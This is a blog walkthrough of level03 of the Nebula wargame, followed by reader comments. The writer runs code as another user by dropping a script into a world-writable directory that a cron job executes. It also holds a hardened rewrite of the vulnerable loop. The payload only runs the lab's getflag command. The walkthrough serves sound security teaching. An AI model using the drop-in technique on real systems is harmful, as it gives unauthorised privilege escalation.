level03
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
cron is a utility used to run tasks periodically, found in nearly every distro.
In /home/flag03, we have a script – writable.sh – and a directory – writable.d.
level03@nebula:/home/flag03$ ls -sl
total 1
0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d
1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
Let’s take a look at writable.sh:
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
This is fairly simple – for each file in the writable.d directory, run it with bash, and then delete it. bash -x runs the script in trace mode, printing each command as it is executed. I think we can ignore ulimit -t 5 – it just limits the CPU time available to the shell to 5 seconds, possibly to stop a malicious script consuming excess resources.
Note that the writable.d directory is world-writable (drwxrwxrwx) – so we can just put a script in there, and it will be run as flag03:
level03@nebula:~$ cat getflag.sh
#!/bin/sh
/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/
Then wait a short while, assuming that the writable.sh script is the one being run by cron…
level03@nebula:/tmp$ ls -sl
total 4
4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out
level03@nebula:/tmp$ cat flag03.out
You have successfully executed getflag on a target account
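The root cause is that the job runs anything found in a directory that any user can write to. The sketch below is an added example, not part of the original post or the Nebula VM: it shows the same loop refusing a group- or world-writable directory and skipping files the job's own user does not own. The names trusted_dir, trusted_file and run_dropins are hypothetical, and it assumes the job should only ever run its own user's files.

```shell
#!/bin/sh
# Added example: a hardened take on the writable.sh loop. Function names are hypothetical.

# True only if $1 is a directory owned by user $2 that group/others cannot write to.
trusted_dir() {
    [ -n "$(find "$1" -prune -type d -user "$2" ! -perm -020 ! -perm -002 -print 2>/dev/null)" ]
}

# True only if $1 is a regular file (find does not follow a symlink here) owned by
# user $2 and not writable by group or others.
trusted_file() {
    [ -n "$(find "$1" -prune -type f -user "$2" ! -perm -020 ! -perm -002 -print 2>/dev/null)" ]
}

# Run the drop-ins in directory $1 on behalf of user $2, then delete them.
# Refuses a directory that anyone else can write to; leaves untrusted files in place.
run_dropins() {
    dir=$1; owner=$2
    if ! trusted_dir "$dir" "$owner"; then
        echo "refusing $dir: not owned by $owner, or group/world-writable" >&2
        return 1
    fi
    for f in "$dir"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # glob matched nothing
        if trusted_file "$f" "$owner"; then
            (ulimit -t 5; sh "$f") || echo "non-zero exit: $f" >&2
            rm -f "$f"
        else
            echo "skipped untrusted file: $f" >&2
        fi
    done
    return 0
}

# Constructed demo in a scratch directory (not the VM's paths).
demo=$(mktemp -d); me=$(id -u)
printf 'echo ran-trusted\n'   > "$demo/ok.sh";  chmod 644 "$demo/ok.sh"
printf 'echo ran-untrusted\n' > "$demo/bad.sh"; chmod 666 "$demo/bad.sh"
run_dropins "$demo" "$me"                 # runs ok.sh, skips bad.sh
chmod 777 "$demo"                         # same mode as writable.d
run_dropins "$demo" "$me" || true         # refuses the whole directory
rm -rf "$demo"
```

Skipped files are deliberately left where they are, so whoever reviews the stderr output can still inspect what was dropped and by whom.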
Aside
Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?
There is a root user in the Nebula VM, and using that I can do:
nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l
*/3 * * * * /home/flag03/writable.sh
But I can’t do that as level03:
level03@nebula:/tmp$ crontab -u flag03 -l
must be privileged to use -u
Also, I could use ps to see that the process runs, but that would presume that I knew it was cron’ed anyway.
So, not sure how I would go about finding cron jobs as an unprivileged user.
I’ve asked on the Unix Stack Exchange.
lollipoponlips
October 16, 2016 at 9:18pm
I’ve just started to do these exercises. I’m confused:
1) what is the objective exactly?
Exploit exercises: Nebula – DweebsUnited
March 16, 2017 at 6:16pm
[…] the cleanest, but it works to get the flag. I had the same thought as Cybergibbons though, (see this article) and from what I see of his findings, the only way to detect cronjobs if you don’t have […]
Shinko
May 6, 2017 at 12:47am
For fun, I decided to try and one-Liner it:
echo -e '#!/usr/bin/bash\n\n/bin/getflag>/home/flag03/got_result.txt\n'>/home/flag03/writable.d/get_flag.sh;chmod +x /home/flag03/writable.d/get_flag.sh
emily
November 18, 2017 at 12:30am
level03@nebula:~$ cat getfile.sh
level03@nebula:~$ cat: getflag.sh: No such file or directory
??
emily
November 18, 2017 at 12:32am
level03@nebula:~$ cat getflag.sh
level03@nebula:~$ cat: getflag.sh: No such file or directory.
What am I doing wrong?
evan
December 27, 2017 at 5:23pm
Did you create the getflag.sh script and is it located in your home directory?
manuelh
March 29, 2018 at 7:56pm
Try the following:
level03@nebula:~$ cat > getflag.sh
#!/bin/sh
/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/